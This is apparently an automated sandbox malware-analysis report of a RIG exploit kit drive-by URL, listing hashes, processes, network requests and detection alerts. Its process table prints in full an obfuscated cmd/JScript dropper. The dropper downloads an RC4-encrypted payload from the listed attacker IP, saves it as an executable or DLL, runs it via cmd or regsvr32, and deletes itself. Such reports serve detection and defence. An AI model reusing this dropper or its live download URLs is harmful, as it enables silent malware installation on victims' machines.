| URL: | http://31.44.2.63/?Mzc0NzQ=&XhUOuOAls&dfdf=during&xcvxcv=81ithick%20.100hg58.406l5e7q8&gffd=during&fdfd=OoQDVbnjUeFfA00nI8LV10R9fumixCAyhGegJ_R-EaMZwNC_sDAHLdq2AnFyoEkNIkvghU&cxvxcv=wnvQMvXcJRXQFYPJJP7cSaxBKU3VGESVxoqenLG3YpfNZGj11_T5QEL6tAitCFiIou1tK&zygQZvdaSHjGMzI1Nw== |
| Full analysis: | https://app.any.run/tasks/dd0732d4-7613-473c-9ed1-c80f2d6a3606 |
| Verdict: | Malicious activity |
| Analysis date: | December 02, 2023, 15:41:11 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MD5: | 3C842A0168DEBE330AFD7C45AECDD99B |
| SHA1: | FE41CD54AEC8C434E378563240DFF45D67FC3B84 |
| SHA256: | BA92B54DAFBDDD39D7A7F9B52DC93BD14456A62FC08EB66739C3D3308315DDFD |
| SSDEEP: | 6:CGNuTbyLA81uCuoBYm6AfBpDC+URXcvWG4Wd03ZT83QxTjLc1n:5UTbykgkcxtfBpG+tvWGqJ1xTjyn |
MALICIOUS
Creates internet connection object (SCRIPT)
- wscript.exe (PID: 1036)
- wscript.exe (PID: 3044)
Starts CMD.EXE for commands execution
- iexplore.exe (PID: 4032)
- iexplore.exe (PID: 2292)
Sends HTTP request (SCRIPT)
- wscript.exe (PID: 1036)
- wscript.exe (PID: 3044)
Deletes a file (SCRIPT)
- wscript.exe (PID: 1036)
- wscript.exe (PID: 3044)
Opens an HTTP connection (SCRIPT)
- wscript.exe (PID: 1036)
- wscript.exe (PID: 3044)
Unusual connection from system programs
- wscript.exe (PID: 3044)
- wscript.exe (PID: 1036)
SUSPICIOUS
Starts CMD.EXE for commands execution
- wscript.exe (PID: 1036)
- wscript.exe (PID: 3044)
Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)
- wscript.exe (PID: 1036)
- wscript.exe (PID: 3044)
Writes binary data to a Stream object (SCRIPT)
- wscript.exe (PID: 1036)
- wscript.exe (PID: 3044)
Gets full path of the running script (SCRIPT)
- wscript.exe (PID: 1036)
- wscript.exe (PID: 3044)
Reads the Internet Settings
- wscript.exe (PID: 1036)
- wscript.exe (PID: 3044)
Accesses command line arguments (SCRIPT)
- wscript.exe (PID: 1036)
- wscript.exe (PID: 3044)
The process downloads a VBScript from the remote host
- cmd.exe (PID: 2964)
- cmd.exe (PID: 644)
Runs shell command (SCRIPT)
- wscript.exe (PID: 1036)
- wscript.exe (PID: 3044)
Changes charset (SCRIPT)
- wscript.exe (PID: 1036)
- wscript.exe (PID: 3044)
Creates FileSystem object to access computer's file system (SCRIPT)
- wscript.exe (PID: 1036)
- wscript.exe (PID: 3044)
Saves data to a binary file (SCRIPT)
- wscript.exe (PID: 1036)
- wscript.exe (PID: 3044)
INFO
Application launched itself
- iexplore.exe (PID: 2144)
Checks supported languages
- wmpnscfg.exe (PID: 3660)
Reads the computer name
- wmpnscfg.exe (PID: 3660)
Manual execution by a user
- wmpnscfg.exe (PID: 3660)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Total processes
53
Monitored processes
13
Malicious processes
7
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 644 | cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("G"+"ET",k(1),1);y.Option(n)=k(2);y.send();y/**/["Wa"+"itForRes"+"ponse"]();if(200==y["sta"+"tus"])return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinHttp."+"WinHttpRequest.5"+".1"),j=a("W"+P+".Shell"),N=a("ADODB.Stream"),x=O(8)+".",p="e"+"xe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";N[Y]=2;N.Charset="iso-8859-1";N.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));N.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;N.savetofile(x,2);N.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(B){};q.Deletefile(K);>yU.tMp && StArt WsCript //B //E:JScript yU.tMp "dfrfgh34" "http://31.44.2.63/?MTYwNzI3&REcYldWvqnx&xcvxcv=88xsunroom.120mr99.406q4w0p7&dfdf=rope&fdfd=rtHMk3OHEePwJH_783OSJ_7PFnzjvHDfF_yrwrcCgWRxaYtL7BVOlbhjBOHeQRjzosMB1kR96Gt3RLUzx-d0sKK_ESNNTpD-ZSlSbB7220&gffd=were&cxvxcv=z3_QMvXcJwDQC4rDKeXFS&EtgecQNTk1OA==" "1" | C:\Windows\System32\cmd.exe | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1036 | WsCript //B //E:JScript yU.tMp "dfrfgh34" "http://31.44.2.63/?OTgyOTg=&OwNdlvglUB&dfdf=during&cxvxcv=w3_QMvXcJx7QFYPIKfncSa&fdfd=FbNUzVH1iKw4yehMildZ-xJWPnvrHFTF-mmV6AEwrPtfJ1bYIFPQLjiELVewRgyolfUFtB8vj7jULXyR7P05SD-xyMMwsQ98OVQLAL0FX9_7NJMMgX&gffd=grid&xcvxcv=113wpancake.123ti64.406o9p4b8&XnVRMTc4OQ==" "1" | C:\Windows\System32\wscript.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 1276 | "C:\Windows\system32\ntvdm.exe" | C:\Windows\System32\ntvdm.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: NTVDM.EXE Exit code: 255 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2144 | "C:\Program Files\Internet Explorer\iexplore.exe" "http://31.44.2.63/?Mzc0NzQ=&XhUOuOAls&dfdf=during&xcvxcv=81ithick%20.100hg58.406l5e7q8&gffd=during&fdfd=OoQDVbnjUeFfA00nI8LV10R9fumixCAyhGegJ_R-EaMZwNC_sDAHLdq2AnFyoEkNIkvghU&cxvxcv=wnvQMvXcJRXQFYPJJP7cSaxBKU3VGESVxoqenLG3YpfNZGj11_T5QEL6tAitCFiIou1tK&zygQZvdaSHjGMzI1Nw==" | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
| 2292 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2144 CREDAT:333058 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
| 2492 | "C:\Windows\system32\ntvdm.exe" | C:\Windows\System32\ntvdm.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: NTVDM.EXE Exit code: 255 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2964 | cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("G"+"ET",k(1),1);y.Option(n)=k(2);y.send();y/**/["Wa"+"itForRes"+"ponse"]();if(200==y["sta"+"tus"])return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinHttp."+"WinHttpRequest.5"+".1"),j=a("W"+P+".Shell"),N=a("ADODB.Stream"),x=O(8)+".",p="e"+"xe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";N[Y]=2;N.Charset="iso-8859-1";N.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));N.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;N.savetofile(x,2);N.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(B){};q.Deletefile(K);>yU.tMp && StArt WsCript //B //E:JScript yU.tMp "dfrfgh34" "http://31.44.2.63/?OTgyOTg=&OwNdlvglUB&dfdf=during&cxvxcv=w3_QMvXcJx7QFYPIKfncSa&fdfd=FbNUzVH1iKw4yehMildZ-xJWPnvrHFTF-mmV6AEwrPtfJ1bYIFPQLjiELVewRgyolfUFtB8vj7jULXyR7P05SD-xyMMwsQ98OVQLAL0FX9_7NJMMgX&gffd=grid&xcvxcv=113wpancake.123ti64.406o9p4b8&XnVRMTc4OQ==" "1" | C:\Windows\System32\cmd.exe | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2984 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2144 CREDAT:78849 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
| 3044 | WsCript //B //E:JScript yU.tMp "dfrfgh34" "http://31.44.2.63/?MTYwNzI3&REcYldWvqnx&xcvxcv=88xsunroom.120mr99.406q4w0p7&dfdf=rope&fdfd=rtHMk3OHEePwJH_783OSJ_7PFnzjvHDfF_yrwrcCgWRxaYtL7BVOlbhjBOHeQRjzosMB1kR96Gt3RLUzx-d0sKK_ESNNTpD-ZSlSbB7220&gffd=were&cxvxcv=z3_QMvXcJwDQC4rDKeXFS&EtgecQNTk1OA==" "1" | C:\Windows\System32\wscript.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 3140 | "C:\Windows\System32\cmd.exe" /c h4gbi.exe | C:\Windows\System32\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
Total events
11 002
Read events
10 909
Write events
91
Delete events
2
Modification events
| (PID) Process: | (2144) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing |
| Operation: | write | Name: | NTPDaysSinceLastAutoMigration |
Value: 0 | |||
| (PID) Process: | (2144) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing |
| Operation: | write | Name: | NTPLastLaunchHighDateTime |
Value: 30847387 | |||
| (PID) Process: | (2144) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager |
| Operation: | write | Name: | NextCheckForUpdateHighDateTime |
Value: 30847437 | |||
| (PID) Process: | (2144) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (2144) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (2144) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main |
| Operation: | write | Name: | CompatibilityFlags |
Value: 0 | |||
| (PID) Process: | (2144) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2144) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2144) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2144) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
Executable files
0
Suspicious files
9
Text files
13
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1276 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\Low\scs6E6E.tmp | text | |
MD5:4C361DEA398F7AEEF49953BDC0AB4A9B | SHA256:06D61C23E6CA59B9DDAD1796ECCC42C032CD8F6F424AF6CFEE5D085D36FF7DFD | |||
| 1276 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\Low\scs6E5E.tmp | text | |
MD5:8CF6DDB5AA59B49F34B967CD46F013B6 | SHA256:EE06792197C3E025B84860A72460EAF628C66637685F8C52C5A08A9CC35D376C | |||
| 4032 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MFAQUS6V\900DHKTG.htm | html | |
MD5:37F8E58B900E6DCCBBEB246E62ED9F0C | SHA256:D0272F8D017F3BF22DC2B13ECE6329DDAD4BC31BAC63C955868386DA7DA05EA3 | |||
| 2144 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | |
MD5:7C476BA44E3114E31352695A40FCCEAC | SHA256:88E0758E53EFF096C1DFA9D84920D6425722AB365EEA679AB68B731621AB907F | |||
| 2144 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EAF8AA29A62AB29E614331747385D816_F9E4DC0B9D5C777357D7DB8DEF51118A | binary | |
MD5:8859BAD2102BEA48CB0AA0F18C1B8CD7 | SHA256:945C282AAA8D1F204D603821C5400BCC3923B4B2E4AB9D62557C3702513D1CC4 | |||
| 2144 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | image | |
MD5:DA597791BE3B6E732F0BC8B20E38EE62 | SHA256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07 | |||
| 2144 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EAF8AA29A62AB29E614331747385D816_F9E4DC0B9D5C777357D7DB8DEF51118A | binary | |
MD5:B1E36EA43209D2309108DA041CF791BA | SHA256:091B5BFBA23DD199A8560F72FE008EA79899B428E34B446885AAFF338808C3DC | |||
| 2144 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\favicon[1].ico | image | |
MD5:DA597791BE3B6E732F0BC8B20E38EE62 | SHA256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07 | |||
| 2144 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\urlblockindex[1].bin | binary | |
MD5:FA518E3DFAE8CA3A0E495460FD60C791 | SHA256:775853600060162C4B4E5F883F9FD5A278E61C471B3EE1826396B6D129499AA7 | |||
| 2144 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\favicon[2].ico | image | |
MD5:DA597791BE3B6E732F0BC8B20E38EE62 | SHA256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
19
DNS requests
10
Threats
4
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4032 | iexplore.exe | GET | 200 | 31.44.2.63:80 | http://31.44.2.63/?Mzc0NzQ=&XhUOuOAls&dfdf=during&xcvxcv=81ithick%20.100hg58.406l5e7q8&gffd=during&fdfd=OoQDVbnjUeFfA00nI8LV10R9fumixCAyhGegJ_R-EaMZwNC_sDAHLdq2AnFyoEkNIkvghU&cxvxcv=wnvQMvXcJRXQFYPJJP7cSaxBKU3VGESVxoqenLG3YpfNZGj11_T5QEL6tAitCFiIou1tK&zygQZvdaSHjGMzI1Nw== | unknown | html | 7.77 Kb | unknown |
1036 | wscript.exe | GET | 200 | 31.44.2.63:80 | http://31.44.2.63/?OTgyOTg=&OwNdlvglUB&dfdf=during&cxvxcv=w3_QMvXcJx7QFYPIKfncSa&fdfd=FbNUzVH1iKw4yehMildZ-xJWPnvrHFTF-mmV6AEwrPtfJ1bYIFPQLjiELVewRgyolfUFtB8vj7jULXyR7P05SD-xyMMwsQ98OVQLAL0FX9_7NJMMgX&gffd=grid&xcvxcv=113wpancake.123ti64.406o9p4b8&XnVRMTc4OQ== | unknown | text | 3 b | unknown |
2292 | iexplore.exe | GET | 200 | 31.44.2.63:80 | http://31.44.2.63/?Mzc0NzQ=&XhUOuOAls&dfdf=during&xcvxcv=81ithick%20.100hg58.406l5e7q8&gffd=during&fdfd=OoQDVbnjUeFfA00nI8LV10R9fumixCAyhGegJ_R-EaMZwNC_sDAHLdq2AnFyoEkNIkvghU&cxvxcv=wnvQMvXcJRXQFYPJJP7cSaxBKU3VGESVxoqenLG3YpfNZGj11_T5QEL6tAitCFiIou1tK&zygQZvdaSHjGMzI1Nw== | unknown | html | 7.76 Kb | unknown |
3044 | wscript.exe | GET | 200 | 31.44.2.63:80 | http://31.44.2.63/?MTYwNzI3&REcYldWvqnx&xcvxcv=88xsunroom.120mr99.406q4w0p7&dfdf=rope&fdfd=rtHMk3OHEePwJH_783OSJ_7PFnzjvHDfF_yrwrcCgWRxaYtL7BVOlbhjBOHeQRjzosMB1kR96Gt3RLUzx-d0sKK_ESNNTpD-ZSlSbB7220&gffd=were&cxvxcv=z3_QMvXcJwDQC4rDKeXFS&EtgecQNTk1OA== | unknown | text | 3 b | unknown |
2144 | iexplore.exe | GET | 200 | 184.24.77.207:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?9c39c51ec95c49f5 | unknown | compressed | 4.66 Kb | unknown |
2144 | iexplore.exe | GET | 200 | 184.24.77.207:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?947160355facb38e | unknown | compressed | 4.66 Kb | unknown |
2144 | iexplore.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | unknown | binary | 312 b | unknown |
2144 | iexplore.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown |
1080 | svchost.exe | GET | 200 | 23.32.238.74:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?95a1910edfe5ddda | unknown | compressed | 65.2 Kb | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4032 | iexplore.exe | 31.44.2.63:80 | — | Itglobal.com Nl B.v. | NL | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
2588 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
1036 | wscript.exe | 31.44.2.63:80 | — | Itglobal.com Nl B.v. | NL | unknown |
2292 | iexplore.exe | 31.44.2.63:80 | — | Itglobal.com Nl B.v. | NL | unknown |
3044 | wscript.exe | 31.44.2.63:80 | — | Itglobal.com Nl B.v. | NL | unknown |
2144 | iexplore.exe | 104.126.37.123:443 | www.bing.com | Akamai International B.V. | DE | unknown |
2144 | iexplore.exe | 184.24.77.207:80 | ctldl.windowsupdate.com | Akamai International B.V. | DE | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
api.bing.com |
| whitelisted |
www.bing.com |
| whitelisted |
ctldl.windowsupdate.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
r20swj13mr.microsoft.com |
| whitelisted |
iecvlist.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
4032 | iexplore.exe | Exploit Kit Activity Detected | ET EXPLOIT_KIT RIG EK URI Struct Mar 13 2017 M2 |
2292 | iexplore.exe | Exploit Kit Activity Detected | ET EXPLOIT_KIT RIG EK URI Struct Mar 13 2017 M2 |
1036 | wscript.exe | Exploit Kit Activity Detected | ET EXPLOIT_KIT RIG EK URI Struct Mar 13 2017 M2 |
3044 | wscript.exe | Exploit Kit Activity Detected | ET EXPLOIT_KIT RIG EK URI Struct Mar 13 2017 M2 |